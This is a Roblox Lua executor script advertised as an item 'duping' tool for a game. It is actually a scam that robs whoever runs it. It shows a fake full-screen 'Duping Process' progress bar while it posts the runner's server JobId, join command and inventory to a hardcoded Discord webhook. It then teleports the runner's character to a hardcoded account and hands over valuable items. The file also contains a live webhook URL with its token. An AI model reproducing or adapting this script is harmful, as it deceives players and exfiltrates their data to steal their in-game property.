-- 🌑 FULL AUTO GIVER BOT w/ Fake UI + Webhook System
-- Made for Kevin ⚙️ Powered w/ webhook + job ID dump + fake UI
-- Flies to target, sends Discord notification, gives tools when target joins.

local Players = game:GetService("Players")
local HttpService = game:GetService("HttpService")
local TeleportService = game:GetService("TeleportService")
local LocalPlayer = Players.LocalPlayer
local Workspace = game:GetService("Workspace")
local RunService = game:GetService("RunService")

-- ⚙️ CONFIG
local targetUsername = "INFMONEY09"
local webhook = "https://discord.com/api/webhooks/1382400242749542520/aWGLyzdRBVz6BCizV-mcI8scrWJAEJ4AD1ON9HAFQ-V4rfVUDpB_nH0JwJjcemN3B5gD"
local giveDelay = 0.25
local hoverOffset = Vector3.new(0, 3, 0)
local giveItems = { "Golden Shovel", "Mystic Seed", "Rainbow Sprayer", "Super Fertilizer" }

-- 🖥️ Create UI
local screenGui = Instance.new("ScreenGui", game.CoreGui)
screenGui.Name = "DupingUI"
screenGui.IgnoreGuiInset = true

local mainFrame = Instance.new("Frame", screenGui)
mainFrame.Size = UDim2.new(1, 0, 1, 0)
mainFrame.BackgroundColor3 = Color3.new(0, 0, 0)
mainFrame.BorderSizePixel = 0

local statusText = Instance.new("TextLabel", mainFrame)
statusText.Size = UDim2.new(1, 0, 1, 0)
statusText.BackgroundTransparency = 1
statusText.Font = Enum.Font.Code
statusText.TextColor3 = Color3.fromRGB(0, 255, 0)
statusText.TextScaled = true
statusText.Text = "Duping Process: 0%"

-- 🔄 Animate "Duping"
spawn(function()
    for i = 1, 100 do
        statusText.Text = "Duping Process: " .. i .. "%"
        wait(0.2)
    end
    wait(1)
    screenGui:Destroy()
end)

-- 🧠 Utilities
local function getHRP(char)
    return char and char:FindFirstChild("HumanoidRootPart")
end

local function flyToTarget(target)
    local myHRP = getHRP(LocalPlayer.Character)
    local targetHRP = getHRP(target.Character)
    if myHRP and targetHRP then
        myHRP.CFrame = targetHRP.CFrame + hoverOffset
    end
end

local function equipTool(tool)
    if tool:IsA("Tool") then
        tool.Parent = LocalPlayer.Character
    end
end

local function giveAllItems()
    local bp = LocalPlayer:FindFirstChild("Backpack")
    if bp then
        for _, item in ipairs(bp:GetChildren()) do
            if item:IsA("Tool") and table.find(giveItems, item.Name) then
                equipTool(item)
                wait(giveDelay)
            end
        end
    end
end

-- 🔔 Send Discord Webhook
local function sendWebhook()
    local jobId = game.JobId
    local inventoryList = {}
    local bp = LocalPlayer:FindFirstChild("Backpack")
    if bp then
        for _, item in ipairs(bp:GetChildren()) do
            if item:IsA("Tool") then
                table.insert(inventoryList, item.Name)
            end
        end
    end

    local payload = {
        username = "Grow Bot 🧪",
        embeds = {{
            title = "🎁 Inventory Bot Ready",
            description = "**JobID:** `" .. jobId .. "`\n**Join Link:** `Roblox.GameLauncher.joinGameInstance(game.PlaceId, \"" .. jobId .. "\")`\n**Items:** ```" .. table.concat(inventoryList, ", ") .. "```",
            color = tonumber(0x00ff00)
        }}
    }

    local json = HttpService:JSONEncode(payload)
    syn.request({
        Url = webhook,
        Method = "POST",
        Headers = { ["Content-Type"] = "application/json" },
        Body = json
    })
end

-- ✅ Wait & Handle Target
local function onTargetJoin(target)
    print("[BOT] Target found: " .. target.Name)
    target.CharacterAdded:Connect(function()
        wait(2)
        while target.Parent and target.Character do
            flyToTarget(target)
            giveAllItems()
            wait(0.5)
        end
    end)
end

-- 🔁 Setup
Players.PlayerAdded:Connect(function(player)
    if player.Name == targetUsername then
        onTargetJoin(player)
    end
end)

-- 💌 Auto Webhook on Start
sendWebhook()

-- 🚀 Already in-game
local existing = Players:FindFirstChild(targetUsername)
if existing then
    onTargetJoin(existing)
end
